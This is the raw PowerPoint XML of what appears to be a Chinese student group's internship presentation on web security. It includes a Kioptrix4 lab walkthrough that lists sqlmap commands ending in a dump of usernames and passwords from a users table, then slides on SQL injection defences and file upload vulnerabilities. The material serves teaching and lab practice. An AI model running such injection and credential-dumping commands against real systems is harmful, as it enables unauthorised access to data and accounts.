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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId55"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="356" r:id="rId3"/>
    <p:sldId id="357" r:id="rId4"/>
    <p:sldId id="302" r:id="rId5"/>
    <p:sldId id="361" r:id="rId6"/>
    <p:sldId id="360" r:id="rId8"/>
    <p:sldId id="363" r:id="rId9"/>
    <p:sldId id="368" r:id="rId10"/>
    <p:sldId id="367" r:id="rId11"/>
    <p:sldId id="366" r:id="rId12"/>
    <p:sldId id="364" r:id="rId13"/>
    <p:sldId id="410" r:id="rId14"/>
    <p:sldId id="409" r:id="rId15"/>
    <p:sldId id="411" r:id="rId16"/>
    <p:sldId id="362" r:id="rId17"/>
    <p:sldId id="293" r:id="rId18"/>
    <p:sldId id="294" r:id="rId19"/>
    <p:sldId id="304" r:id="rId20"/>
    <p:sldId id="305" r:id="rId21"/>
    <p:sldId id="306" r:id="rId22"/>
    <p:sldId id="307"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413" r:id="rId51"/>
    <p:sldId id="354" r:id="rId52"/>
    <p:sldId id="355" r:id="rId53"/>
    <p:sldId id="414" r:id="rId54"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="YouSheBiaoTiHei" panose="00000500000000000000" charset="-122"/>
      <p:regular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7" d="100"/>
          <a:sy n="107" d="100"/>
        </p:scale>
        <p:origin x="84" y="13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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><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Medium"/>
              <a:ea typeface="思源黑体 Medium"/>
              <a:cs typeface="思源黑体 Medium" panose="020B06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思源黑体 Medium"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="思源黑体 Medium"/>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Medium"/>
              <a:ea typeface="思源黑体 Medium"/>
              <a:cs typeface="思源黑体 Medium" panose="020B06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思源黑体 Medium"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="思源黑体 Medium"/>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Medium"/>
                <a:ea typeface="思源黑体 Medium"/>
                <a:cs typeface="思源黑体 Medium" panose="020B06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Medium"/>
                <a:ea typeface="思源黑体 Medium"/>
                <a:cs typeface="思源黑体 Medium" panose="020B06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Medium"/>
                <a:ea typeface="思源黑体 Medium"/>
                <a:cs typeface="思源黑体 Medium" panose="020B06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Medium"/>
                <a:ea typeface="思源黑体 Medium"/>
                <a:cs typeface="思源黑体 Medium" panose="020B06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Medium"/>
        <a:ea typeface="思源黑体 Medium"/>
        <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="思源黑体 Medium"/>
        <a:ea typeface="思源黑体 Medium"/>
        <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="思源黑体 Medium"/>
        <a:ea typeface="思源黑体 Medium"/>
        <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="思源黑体 Medium"/>
        <a:ea typeface="思源黑体 Medium"/>
        <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="思源黑体 Medium"/>
        <a:ea typeface="思源黑体 Medium"/>
        <a:cs typeface="思源黑体 Medium" panose="020B06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字符型注入，需要闭合，闭合字符为 ' </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E2E"/>
            </a:gs>
            <a:gs pos="70000">
              <a:srgbClr val="02174E"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
          </a:path>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Medium"/>
                <a:ea typeface="思源黑体 Medium"/>
                <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000"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Medium"/>
                <a:ea typeface="思源黑体 Medium"/>
                <a:cs typeface="思源黑体 Medium" panose="020B06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Medium"/>
                <a:ea typeface="思源黑体 Medium"/>
                <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000"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思源黑体 Medium"/>
          <a:ea typeface="思源黑体 Medium"/>
          <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>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思源黑体 Medium"/>
          <a:ea typeface="思源黑体 Medium"/>
          <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000"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思源黑体 Medium"/>
          <a:ea typeface="思源黑体 Medium"/>
          <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000"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思源黑体 Medium"/>
          <a:ea typeface="思源黑体 Medium"/>
          <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000"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思源黑体 Medium"/>
          <a:ea typeface="思源黑体 Medium"/>
          <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000"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思源黑体 Medium"/>
          <a:ea typeface="思源黑体 Medium"/>
          <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000"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4.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.jpe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76257"/>
            <a:ext cx="12195810" cy="6870700"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="19206"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="72" name="组合 71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2151740" y="2172225"/>
            <a:ext cx="8693282" cy="1466413"/>
            <a:chOff x="3443" y="5032"/>
            <a:chExt cx="11808" cy="662"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3443" y="5032"/>
              <a:ext cx="11808" cy="662"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="019FE1"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="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8" name="文本框 67"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4228" y="5138"/>
              <a:ext cx="9930" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
                </a:rPr>
                <a:t>毕业实习答辩</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="60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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="79" name="组合 78"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1766949" y="4106094"/>
            <a:ext cx="5052951" cy="527505"/>
            <a:chOff x="4405" y="7934"/>
            <a:chExt cx="5015" cy="745"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="矩形 73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013" y="7934"/>
              <a:ext cx="3732" cy="745"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="023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sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="文本框 75"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4405" y="8019"/>
              <a:ext cx="5015" cy="563"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" spc="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:uFillTx/>
                  <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                </a:rPr>
                <a:t>汇报小组：凑不够人数</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" spc="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                </a:rPr>
                <a:t>组</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="78" name="组合 77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7057367" y="4112185"/>
            <a:ext cx="2855595" cy="521414"/>
            <a:chOff x="10790" y="6526"/>
            <a:chExt cx="4497" cy="745"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="矩形 74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10790" y="6526"/>
              <a:ext cx="4387" cy="745"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="023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77" name="文本框 76"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10879" y="6615"/>
              <a:ext cx="4408" cy="570"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" spc="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:uFillTx/>
                  <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                </a:rPr>
                <a:t>汇报时间：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" spc="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                </a:rPr>
                <a:t>2025.7.9</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4774542" y="4989815"/>
            <a:ext cx="5212080" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr sz="2000" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
              </a:rPr>
              <a:t>小组组长：高子轩 </a:t>
            </a:r>
            <a:endParaRPr sz="2000" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
              <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
              <a:cs typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr sz="2000" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
              </a:rPr>
              <a:t>成员：杨佳伲，刘佳贝，余行行，冯章维</a:t>
            </a:r>
            <a:endParaRPr sz="2000" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
              <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
              <a:cs typeface="思源黑体 Bold" panose="020B0800000000000000"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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346075" y="229870"/>
            <a:ext cx="9901555" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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实战：kioptrix4</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 level2 sqlm</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ap</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自动注入</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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1242060" y="1170940"/>
            <a:ext cx="8718550" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>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保存抓包文件进行爆破</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Sqlmap注入</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sqlmap -r kio1.txt  --level 5 --risk 3</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sqlmap -r kio1.txt  --level 5 --risk 3 --dbs</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sqlmap -r kio1.txt  --level 5 --risk 3 -D webapp --tables</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sqlmap -r kio1.txt  --level 5 --risk 3 -D webapp -T users --columns </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sqlmap -r kio1.txt  --level 5 --risk 3 -D webapp -T users -C username,password --dump</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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346075" y="229870"/>
            <a:ext cx="9901555" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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实战：kioptrix4</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 level2 sqlm</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ap</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自动注入</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pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="图片 99"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="688340" y="721360"/>
            <a:ext cx="7165975" cy="4853305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460115" y="1283335"/>
            <a:ext cx="7419975" cy="5181600"/>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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346075" y="229870"/>
            <a:ext cx="9901555" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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实战：kioptrix4</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 level2 sqlm</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ap</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自动注入</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pic>
        <p:nvPicPr>
          <p:cNvPr id="101" name="图片 100"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="558165" y="974090"/>
            <a:ext cx="7219950" cy="5153660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2969895" y="1209040"/>
            <a:ext cx="6445250" cy="4683125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530350" y="1891665"/>
            <a:ext cx="7266940" cy="5107940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4774565" y="1209040"/>
            <a:ext cx="7138035" cy="5198745"/>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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346075" y="229870"/>
            <a:ext cx="990155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sql</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注入防御</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方法</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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2381250" y="1167130"/>
            <a:ext cx="7866380" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>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1. 参数化预编译：将SQL代码与数据分离</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2.</a:t>
            </a:r>
            <a:r>
              <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数据库存储过程并严格限制参数类型</a:t>
            </a:r>
            <a:endPar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3.</a:t>
            </a:r>
            <a:r>
              <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输入验证与净化：白名单验证（优于黑名单）、数据类型验证（数字、字符串等）、正则表达式过滤</a:t>
            </a:r>
            <a:endPar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4.</a:t>
            </a:r>
            <a:r>
              <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动态输出内容进行HTML/URL编码</a:t>
            </a:r>
            <a:endPar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5.安全配置关闭错误回显（生产环境）</a:t>
            </a:r>
            <a:endPar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禁用多语句查询（如PHP的PDO::MYSQL_ATTR_MULTI_STATEMENTS=false）</a:t>
            </a:r>
            <a:endPar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更新数据库补丁</a:t>
            </a:r>
            <a:endPar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6.部署WAF规则过滤常见注入模式</a:t>
            </a:r>
            <a:endPar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7.二次验证对敏感操作实施二次验证机制</a:t>
            </a:r>
            <a:endPar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8.安全审计:定期代码审计</a:t>
            </a:r>
            <a:endPar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3" name="文本框 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2232977" y="3290442"/>
            <a:ext cx="7649845" cy="1106805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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文件上传</a:t>
            </a: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a:t>
            </a:r>
            <a:endPar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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="72" name="组合 71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4497707" y="2357310"/>
            <a:ext cx="3088005" cy="617855"/>
            <a:chOff x="6683" y="5071"/>
            <a:chExt cx="4863" cy="973"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6683" y="5071"/>
              <a:ext cx="4863" cy="973"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="019FE1"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="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8" name="文本框 67"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7555" y="5098"/>
              <a:ext cx="3119" cy="919"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <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rPr>
                <a:t>Part 02</a:t>
              </a:r>
              <a:endPar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12923" y="-1270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2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549275" y="986790"/>
            <a:ext cx="4766945" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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1</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、什么是</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文件上传</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7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="953770" y="1782445"/>
            <a:ext cx="4552315" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件上传漏洞是指</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>应用程序未对用户上传的文件进行严格验证（如类型、大小、内容等），导致攻击者可上传恶意文件（如木马、脚本），进而执行任意代码、控制服务器或发起其他攻击（如钓鱼、数据泄露）。常见风险点包括未限制文件扩展名、未检查文件内容、存储路径可预测等。防御需结合黑白名单校验、重命名、隔离存储及服务器配置加固。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
